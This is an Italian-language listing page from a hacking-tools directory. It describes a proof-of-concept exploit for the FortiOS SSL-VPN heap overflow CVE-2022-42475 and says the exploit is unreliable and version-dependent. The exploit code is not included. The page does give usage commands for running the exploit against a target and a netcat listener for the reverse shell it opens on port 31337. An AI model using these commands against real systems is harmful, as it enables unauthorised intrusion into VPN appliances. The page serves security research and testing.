Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2022-42475 — Vulnerabilità di buffer overflow in FortiOS | Kitploit
Strumenti/GitHubGitHub/amir-hy/cve-2022-42475
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubamir-hy/cve-2022-42475

cve-2022-42475

Vulnerabilità di buffer overflow in FortiOS

Vedi Repository
7113 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Vulnerabilità di buffer overflow in FortiOS SSL-VPN

cve-2022-42475

https://nvd.nist.gov/vuln/detail/CVE-2022-42475 Codice POC per sfruttare l'heap overflow nel demone SSLVPN di Fortinet

Note

Questo è un POC rapido e sporco che probabilmente non funzionerà da nessuna parte a meno che tu non sia estremamente fortunato. Dipende dalla versione e contiene alcuni offset hardcoded che molto probabilmente cambieranno da un sistema all'altro.

Utilizzo

python3 cve-2022-42475.py rhost rport lhost 'command'

root@kitploit:~
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'

Listener

Il POC utilizza un comando python per impostare una reverse shell sulla porta 31337

root@kitploit:~
nc -lvnp 31337

Dichiarazione di non responsabilità

Questo progetto è realizzato solo per scopi educativi e di test etici. L'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.

Scarica lo strumento

Ringraziamenti

Grazie a Alain M - Twitter : @plopz0r